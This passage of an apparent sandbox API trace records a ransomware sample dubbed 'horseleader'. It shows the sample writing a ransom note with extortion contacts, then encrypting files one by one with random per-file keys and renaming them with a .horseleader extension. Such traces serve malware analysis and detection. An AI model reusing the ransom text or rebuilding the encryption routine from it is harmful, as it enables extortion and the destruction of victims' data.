dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.734] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.735] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.736] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.736] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.736] CloseHandle (hObject=0x158) returned 1 [0246.736] 
GetProcessHeap () returned 0x780000 [0246.736] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.736] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ECHO", cAlternateFileName="")) returned 1 [0246.736] lstrcmpiW (lpString1="ECHO", lpString2="Windows") returned -1 [0246.736] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO") returned 64 [0246.736] lstrcmpW (lpString1="ECHO", lpString2=".") returned 1 [0246.736] lstrcmpW (lpString1="ECHO", lpString2="..") returned 1 [0246.736] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.736] GetProcessHeap () returned 0x780000 [0246.736] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.736] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*") returned 66 [0246.736] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.738] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.738] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\.") returned 66 [0246.738] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.738] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.738] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.738] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\..") returned 67 [0246.738] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.738] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.738] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8a45100, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf8a45100, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xb0ce, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ECHO.ELM", cAlternateFileName="")) returned 1 [0246.738] lstrcmpiW (lpString1="ECHO.ELM", lpString2="Windows") returned -1 [0246.738] wnsprintfW (in: 
pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 73 [0246.738] StrStrIW (lpFirst="ECHO.ELM", lpSrch=".horseleader") returned 0x0 [0246.739] lstrcmpW (lpString1="ECHO.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.739] lstrcmpW (lpString1="ECHO.ELM", lpString2="_uninstalling_.png") returned 1 [0246.739] lstrlenW (lpString=".testttjffg") returned 11 [0246.739] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM", lpSrch=".testttjffg") returned 0x0 [0246.739] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.739] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.739] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 73 [0246.740] StrStrW (lpFirst="ECHO.ELM", lpSrch=".txt") returned 0x0 [0246.740] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=45262) returned 1 [0246.740] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.742] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0246.742] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.743] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.744] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.744] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.744] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x10ce, lpOverlapped=0x0) returned 1 [0246.744] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffef32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.744] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x10ce, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x10ce, lpOverlapped=0x0) returned 1 [0246.744] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.744] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.744] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, 
lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.744] CloseHandle (hObject=0x1a4) returned 1 [0246.744] GetProcessHeap () returned 0x780000 [0246.745] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.745] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM.horseleader") returned 85 [0246.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm.horseleader")) returned 1 [0246.745] GetProcessHeap () returned 0x780000 [0246.745] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.746] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x608b7590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1f7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ECHO.INF", cAlternateFileName="")) returned 1 [0246.746] lstrcmpiW (lpString1="ECHO.INF", lpString2="Windows") returned -1 [0246.746] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 73 [0246.746] StrStrIW (lpFirst="ECHO.INF", lpSrch=".horseleader") returned 0x0 
[0246.746] lstrcmpW (lpString1="ECHO.INF", lpString2="#Decrypt#.txt") returned 1 [0246.746] lstrcmpW (lpString1="ECHO.INF", lpString2="_uninstalling_.png") returned 1 [0246.746] lstrlenW (lpString=".testttjffg") returned 11 [0246.746] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF", lpSrch=".testttjffg") returned 0x0 [0246.746] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.746] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.746] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.746] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF") returned 73 [0246.746] StrStrW (lpFirst="ECHO.INF", lpSrch=".txt") returned 0x0 [0246.746] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=503) returned 1 [0246.747] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f7, lpOverlapped=0x0) returned 1 [0246.748] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe09, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.748] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f7, lpOverlapped=0x0) 
returned 1 [0246.748] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.748] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.748] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.748] CloseHandle (hObject=0x1a4) returned 1 [0246.748] GetProcessHeap () returned 0x780000 [0246.748] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.748] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF.horseleader") returned 85 [0246.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.inf.horseleader")) returned 1 [0246.751] GetProcessHeap () returned 0x780000 [0246.751] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.751] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, 
nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.751] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.751] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 76 [0246.751] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.751] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.751] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.751] lstrlenW (lpString=".testttjffg") returned 11 [0246.751] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.751] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.752] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.752] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.752] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF") returned 76 [0246.752] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.752] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1453) returned 1 [0246.752] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5ad, lpOverlapped=0x0) returned 1 [0246.880] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.880] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5ad, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5ad, lpOverlapped=0x0) returned 1 [0246.880] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.881] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.881] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.881] CloseHandle (hObject=0x1a4) returned 1 [0246.881] GetProcessHeap () returned 0x780000 [0246.881] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.881] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.horseleader") returned 88 [0246.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\echo\\preview.gif.horseleader")) returned 1 [0246.883] GetProcessHeap () returned 0x780000 [0246.883] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.883] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6212, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.883] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.883] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 77 [0246.883] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.883] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.883] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.883] lstrlenW (lpString=".testttjffg") returned 11 [0246.883] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.883] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.883] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft 
shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.884] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 77 [0246.884] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.884] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=25106) returned 1 [0246.885] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.891] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, 